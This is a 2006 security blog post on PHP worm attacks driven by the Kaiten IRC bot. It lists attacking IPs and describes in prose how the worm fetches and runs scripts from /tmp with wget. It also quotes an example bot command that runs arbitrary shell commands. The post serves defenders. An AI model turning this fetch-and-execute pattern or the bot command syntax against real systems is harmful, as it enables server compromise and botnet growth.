« Two new OS X worms: Leap and Inqtana | Main | The Domain Name Service as an IDS The Domain Name Service as an IDS »
Recent PHP Worm Activity
For the past several months we've been seeing a lot of PHP-based attacks that have been related to a semi-worm toolkit. It's a Kaiten-based bot which makes the IRC connections, sometimes a Perl connect back shell, and finally an exploit toolkit. The targets are PHP based apps that use either command injection or XML-RPC attacks. Looking through my logs I see these IPs making the attacks for the month of February, 2006.
| Count | ASN | Source IP | AS by name |
|---|---|---|---|
| 1 | 3356 | 212.3.249.x | LEVEL3 Level 3 Communications |
| 1 | 4986 | 69.10.171.x | INTERSTAR - InterStar Network |
| 3 | 12322 | 82.238.26.x | PROXAD AS for Proxad ISP |
| 3 | 852 | 142.59.19.x | ASN852 - Telus Advanced Commun |
| 3 | 9200 | 195.85.176.x | ESSENTKABELCOM Essent Kabelcom |
| 3 | 16276 | 213.251.165.x | OVH OVH |
| 3 | 17676 | 219.184.148.x | JPNIC-JP-ASN-BLOCK Japan Netwo |
| 3 | 22909 | 68.41.59.x | DNEO-OSP1 - Comcast Cable Comm |
| 6 | 3269 | 85.45.227.x | ASN-IBSNAZ TELECOM ITALIA |
| 6 | 8708 | 193.230.212.x | RDSNET Romania Data Systems S. |
| 6 | 8762 | 193.92.9.x | TEI-OF-CRETE-AS Technological |
| 6 | 10834 | 200.5.98.x | Telefonica Data Argentina S.A. |
| 6 | 4837 | 202.107.54.x | CHINA169-BACKBONE CNCGROUP Chi |
| 6 | 4808 | 202.108.248.x | CHINA169-BJ CNCGROUP IP networ |
| 6 | 13749 | 207.44.240.x | EVERYONES-INTERNET - Everyones |
| 6 | 6539 | 209.17.129.x | GT-BELL - Bell Canada |
| 6 | 6619 | 211.189.39.x | ERX-SIGMA-NET Samsung Global M |
| 6 | 4134 | 61.183.15.x | CHINANET-BACKBONE No.31,Jin-ro |
| 6 | 9132 | 62.206.128.x | BMCAG-AS Broadnet mediascape c |
| 6 | 209 | 67.128.88.x | ASN-QWEST - Qwest |
| 6 | 15082 | 69.42.145.x | PRIMEINTER - Prime Internet Ne |
| 6 | 12578 | 80.232.165.x | APOLLO-AS LATTELEKOM-APOLLO |
| 6 | 2856 | 81.137.250.x | BT-UK-AS BTnet UK Regional net |
| 6 | 6724 | 81.169.162.x | STRATO Strato AG |
| 6 | 24915 | 81.29.237.x | ASN-TELEUNIT Teleunit S.p.A. |
| 6 | 8767 | 82.135.33.x | MNET-AS M_net AS |
| 8 | 3269 | 82.54.234.x | ASN-IBSNAZ TELECOM ITALIA |
| 8 | 6467 | 199.227.64.x | ESPIRECOMM - Xspedius Communic |
| 8 | 11468 | 216.83.6.x | NSDATA - Nova Scotia Data Ltd. |
| 8 | 10738 | 64.84.32.x | MASTERLINK - MasterLink, Inc. |
| 12 | 23236 | 65.222.97.x | NETV - Netvendor |
| 12 | 278 | 132.248.103.x | Red Academica de Mexico |
| 12 | 6677 | 157.157.88.x | ICENET-AS1 ICENET Autonomous s |
| 12 | 34496 | 194.116.186.x | PLANET-SCHOOL-AS Planet School |
| 12 | 1680 | 194.90.30.x | NetVision Ltd. |
| 12 | 23974 | 202.143.162.x | MOE-EDNET-AS-AP Ministry of ed |
| 12 | 3701 | 204.27.190.x | NERONET - Oregon Joint Graduat |
| 12 | 12449 | 212.69.204.x | DSVR-AS1 DSVR Autonomous Syste |
Keep your eyes on your logs, look for PHP attacks that use "wget" to call out and fetch a bootstrap script, and make sure your machine is up-to-date. The botnets that have been growing out of this are thousands of machines big and can do some damage
Update
Some technical notes. Kaiten is the name of a bot to which the source is available. It's written in C, is usually a single source code file, and has hardcoded IRC servers and channels. It's basically an IRC client that logs in to a server, receives commands from the users. You can issue commands like "!PDMGV SH ls / " (where "PDMGV" is the bot's nick) to have an arbitrary shell command executed, and you have access to scanning, DDoS attacks, etc ... Kaiten does not spread on its own. It can drive a scanner and an exploit tool, but it does not spread on its own. It's not the total of the "worm" kit here. (This harkens back to the late 1990's, where Eggdrop bots would appear on compromised Linux boxes. Eggdrop is not a worm, but it does give a compromised box access via IRC.) The propagation is done like this:
- Scan for web servers to attack in one way or another. Search or scan or whatever.
- Launch attacks, and issue commands to the victim to run "wget" to get a script from a server. Copy the script to /tmp, execute the script, and disconnect.
- The script is downloaded, launched, and it will "wget" two more executables. When run, they connect to the IRC server and can be used to launch attacks.
If you'd like to read more about these threats, have a look at the following links:
- UNIX_MARE.D from Trend Micro
- Linux.Plupii.C from Symantec.
- ELF_MARE.C from Trend Micro
- Perl_MARE.C from Trend Micro
- Perl_Shellbot.AI from Secunia (pointing to two AV writups)
February 21, 2006 in new trends | Permalink
Tell others: digg submit
|
del.icio.us this
|
Reddit
Comments
"Kaiten is the name of a bot to which the source is available"
could you point a link to it?
Posted by: Roy | Feb 22, 2006 4:14:21 AM
nope, not gonna share it, you'll have to google around for it. it's in all the obvious places ...
Posted by: jose | Feb 22, 2006 10:38:02 AM
I rarely comment on blogs but yours I had to stop and say Great Blog!!
Posted by: viagra | May 14, 2009 2:48:42 PM
The comments to this entry are closed.
